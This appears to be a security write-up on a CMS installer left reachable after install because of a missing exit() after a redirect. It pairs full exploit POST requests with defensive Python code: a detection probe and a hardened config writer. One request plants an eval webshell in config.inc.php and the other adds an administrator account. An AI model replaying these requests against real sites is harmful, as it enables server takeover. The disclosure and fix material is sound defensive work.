The problem is in /install/index.php. When installation finishes, an install.lock file is created in the program's root directory, but the check for install.lock in /install/index.php is wrong.
<?php
if(file_exists("../install.lock"))
{
    header("Location: ../"); // no exit() after the redirect
}

//echo 'tst';exit;
require_once("init.php");
if(empty($_REQUEST['step']) || $_REQUEST['step']==1)
{
So when install.lock exists, header() only sends a 302 redirect and the script never calls exit(): the browser follows the redirect, but the rest of /install/index.php still runs for whoever sent the request. (The fix is an exit() immediately after header().) At least two vulnerabilities come out of this.
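A quick way to tell a properly locked installer from this "redirect without exit" pattern, as an added example that is not part of the original post or the CMS: fetch the install script without following redirects and see whether the installer page still comes back in the body of the 302. The URL, the port, and the marker strings looked for in the body are assumptions of this example.

```python
"""Probe for an install script that sends a Location header but keeps running.
Added example, not the CMS's own code.  Assumptions: the locked installer
answers a bare GET with a 302 and an empty body, while the unfixed one
renders the step-1 template after the 302, so the body contains installer
markup (the markers below are guesses at what that markup contains)."""
import http.client
from urllib.parse import urlsplit

# Strings that would only appear in the installer's own page (assumed).
INSTALL_MARKERS = (b"install", b"step", b"mysql_host")


def classify(status, location, body):
    """Classify one raw HTTP response: 'locked', 'open', 'bypassable' or 'unknown'."""
    is_redirect = status in (301, 302, 303, 307, 308) and location is not None
    has_installer = bool(body.strip()) and any(m in body for m in INSTALL_MARKERS)
    if is_redirect and has_installer:
        return "bypassable"   # Location was sent, but the script ran on and rendered the installer
    if is_redirect:
        return "locked"       # redirect with an empty body: exit() was called
    if has_installer:
        return "open"         # no install.lock at all; installer is simply exposed
    return "unknown"


def probe(url):
    """GET url with http.client (which does not follow redirects) and classify it."""
    u = urlsplit(url)
    conn = http.client.HTTPConnection(u.hostname, u.port or 80, timeout=10)
    conn.request("GET", u.path or "/", headers={"Host": u.netloc})
    resp = conn.getresponse()
    body = resp.read()
    conn.close()
    return classify(resp.status, resp.getheader("Location"), body)


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "http://192.168.80.129/canting/install/index.php"
    print(target, "->", probe(target))
```

A 302 with a non-empty body is the tell: PHP has already sent the Location header, yet the output that follows is whatever the rest of the script produced.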
1. getshell (dangerous)
if(empty($_REQUEST['step']) || $_REQUEST['step']==1)
{
    $smarty->assign("step",1);
    $smarty->display("index.html");
}elseif($_REQUEST['step']==2)
{
    $mysql_host=trim($_POST['mysql_host']);
    $mysql_user=trim($_POST['mysql_user']);
    $mysql_pwd=trim($_POST['mysql_pwd']);
    $mysql_db=trim($_POST['mysql_db']);
    $tblpre=trim($_POST['tblpre']);
    $domain==trim($_POST['domain']); // sic: "==" in the original, a comparison, so $domain is never assigned
    $str="<?php \r\n";
    $str.='define("MYSQL_HOST","'.$mysql_host.'");'."\r\n";
    $str.='define("MYSQL_USER","'.$mysql_user.'");'."\r\n";
    $str.='define("MYSQL_PWD","'.$mysql_pwd.'");'."\r\n";
    $str.='define("MYSQL_DB","'.$mysql_db.'");'."\r\n";
    $str.='define("MYSQL_CHARSET","GBK");'."\r\n";
    $str.='define("TABLE_PRE","'.$tblpre.'");'."\r\n";
    $str.='define("DOMAIN","'.$domain.'");'."\r\n";
    $str.='define("SKINS","default");'."\r\n";
    $str.='?>';
    file_put_contents("../config/config.inc.php",$str); // the submitted values are written into a PHP file unescaped
The code above writes the POSTed values straight into ../config/config.inc.php without any escaping. A double quote in mysql_host closes the string literal, so the POST request below makes the first define line read define("MYSQL_HOST","test");@eval($_POST[x]);?>//"); and config.inc.php becomes a one-line webshell:
POST /canting/install/index.php?m=index&step=2 HTTP/1.1
Host: 192.168.80.129
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.80.129/canting/install/index.php?step=1
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
Content-Type: application/x-www-form-urlencoded
Content-Length: 126

mysql_host=test");@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD
This method is dangerous, though: config.inc.php is overwritten with the submitted values and the file is cut off at the injected ?>, so the site stops working.
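To make the injection concrete, here is an added example (my code, not the page's or the CMS's) that mirrors the step=2 writer quoted above as a Python function, shows what the mysql_host payload turns into, and puts a hardened writer next to it. The POST field names and the file layout follow the quoted PHP; the whitelist regex, the single-quote escaping, and the post-write lint regex are assumptions of this example.

```python
"""Vulnerable vs. hardened config writer for /install/index.php step=2.
Added example; not code from the page or from the CMS it describes."""
import re

# The attacker's POST body from the request above (constructed dict).
PAYLOAD_POST = {
    "mysql_host": 'test");@eval($_POST[x]);?>//',
    "mysql_user": "1", "mysql_pwd": "2", "mysql_db": "3",
    "tblpre": "koufu_", "domain": "www",
}
# A benign body such as a real install would send (constructed).
BENIGN_POST = {
    "mysql_host": "localhost", "mysql_user": "canting", "mysql_pwd": "s3cret",
    "mysql_db": "canting", "tblpre": "koufu_", "domain": "www.example.com",
}


def build_config_vulnerable(post):
    """Mirror of the quoted PHP: each value is dropped between the double quotes
    of a define() unescaped, so a '"' in a value ends the literal and whatever
    follows is executed as PHP when config.inc.php is next included."""
    v = {k: post[k].strip() for k in ("mysql_host", "mysql_user", "mysql_pwd", "mysql_db", "tblpre")}
    domain = ""  # the original has '$domain==trim(...)' (a comparison), so $domain is never set
    s = "<?php \r\n"
    s += 'define("MYSQL_HOST","%s");\r\n' % v["mysql_host"]
    s += 'define("MYSQL_USER","%s");\r\n' % v["mysql_user"]
    s += 'define("MYSQL_PWD","%s");\r\n' % v["mysql_pwd"]
    s += 'define("MYSQL_DB","%s");\r\n' % v["mysql_db"]
    s += 'define("MYSQL_CHARSET","GBK");\r\n'
    s += 'define("TABLE_PRE","%s");\r\n' % v["tblpre"]
    s += 'define("DOMAIN","%s");\r\n' % domain
    s += 'define("SKINS","default");\r\n'
    return s + "?>"


_IDENT = re.compile(r"^[A-Za-z0-9._:-]{1,64}$")  # assumed whitelist for host/user/db/prefix/domain


def php_single_quoted(value):
    """Escape for a PHP single-quoted literal, the way var_export() does:
    only backslash and the quote are special and nothing is interpolated."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


def build_config_hardened(post):
    """Same file written safely: structural fields must match the whitelist,
    the password may be anything but is escaped, and there is no closing '?>'."""
    keys = ("mysql_host", "mysql_user", "mysql_pwd", "mysql_db", "tblpre", "domain")
    v = {k: post.get(k, "").strip() for k in keys}
    for k in ("mysql_host", "mysql_user", "mysql_db", "tblpre", "domain"):
        if not _IDENT.match(v[k]):
            raise ValueError("refusing to write config: bad value for %s" % k)
    entries = [("MYSQL_HOST", v["mysql_host"]), ("MYSQL_USER", v["mysql_user"]),
               ("MYSQL_PWD", v["mysql_pwd"]), ("MYSQL_DB", v["mysql_db"]),
               ("MYSQL_CHARSET", "GBK"), ("TABLE_PRE", v["tblpre"]),
               ("DOMAIN", v["domain"]), ("SKINS", "default")]
    lines = ["<?php"] + ["define(%s, %s);" % (php_single_quoted(n), php_single_quoted(x))
                         for n, x in entries]
    return "\n".join(lines) + "\n"


# One define() of a string literal per line; '$' is banned inside double quotes
# because PHP would interpolate it there.
_DEFINE_LINE = re.compile(
    r"""^define\((?:"[A-Z_]+"|'[A-Z_]+'),\s?(?:"(?:[^"\\$]|\\.)*"|'(?:[^'\\]|\\.)*')\);$""")


def looks_like_plain_config(text):
    """Post-write check: True only if the file is '<?php', then nothing but
    define() lines, then optionally '?>'.  The injected line fails because
    code follows its first ');'."""
    lines = [ln.strip() for ln in text.replace("\r\n", "\n").split("\n") if ln.strip()]
    if not lines or lines[0] != "<?php":
        return False
    body = lines[1:]
    if body and body[-1] == "?>":
        body = body[:-1]
    return all(_DEFINE_LINE.match(ln) for ln in body)


if __name__ == "__main__":
    print(build_config_vulnerable(PAYLOAD_POST))
    print("plain config?", looks_like_plain_config(build_config_vulnerable(PAYLOAD_POST)))
    print(build_config_hardened(BENIGN_POST))
```

The whitelist does the real work: a hostname, user, database name or table prefix has no business containing a quote, a semicolon or a parenthesis, so the injection is rejected before anything touches the filesystem. Escaping alone would also keep the payload inside the string, but rejecting it is the better signal. The lint is a cheap sanity check to run on the written file; it would also catch the original injected line.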
2. Adding an administrator directly
elseif($_REQUEST['step']==5)
{
    if($_POST)
    {
        require_once("../config/config.inc.php");
        $link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);
        mysql_select_db(MYSQL_DB,$link);
        mysql_query("SET NAMES ".MYSQL_CHARSET );
        mysql_query("SET sql_mode=''");

        $adminname=trim($_POST['adminname']);
        $pwd1=trim($_POST['pwd1']);
        $pwd2=trim($_POST['pwd2']);
        if(empty($adminname))
        {
            echo "<script>alert('管理员不能为空');history.go(-1);</script>"; // "administrator name cannot be empty"
            exit();
        }
        if(($pwd1!=$pwd2) or empty($pwd1))
        {
            echo "<script>alert('两次输入的密码不一致');history.go(-1);</script>"; // "passwords do not match"; no exit() here either
        }
        mysql_query("insert into ".TABLE_PRE."admin(adminname,password,isfounder) values('$adminname','".umd5($pwd1)."',1)"); // inserts an administrator row directly
    }
Since this branch loads the live ../config/config.inc.php, the INSERT goes into the site's real database, so we can add an administrator account qingshen/qingshen directly with the following request:
POST /canting/install/index.php?m=index&step=5 HTTP/1.1
Host: 192.168.80.129
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.80.129/canting/install/index.php?step=1
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
Content-Type: application/x-www-form-urlencoded
Content-Length: 46

adminname=qingshen&pwd1=qingshen&pwd2=qingshen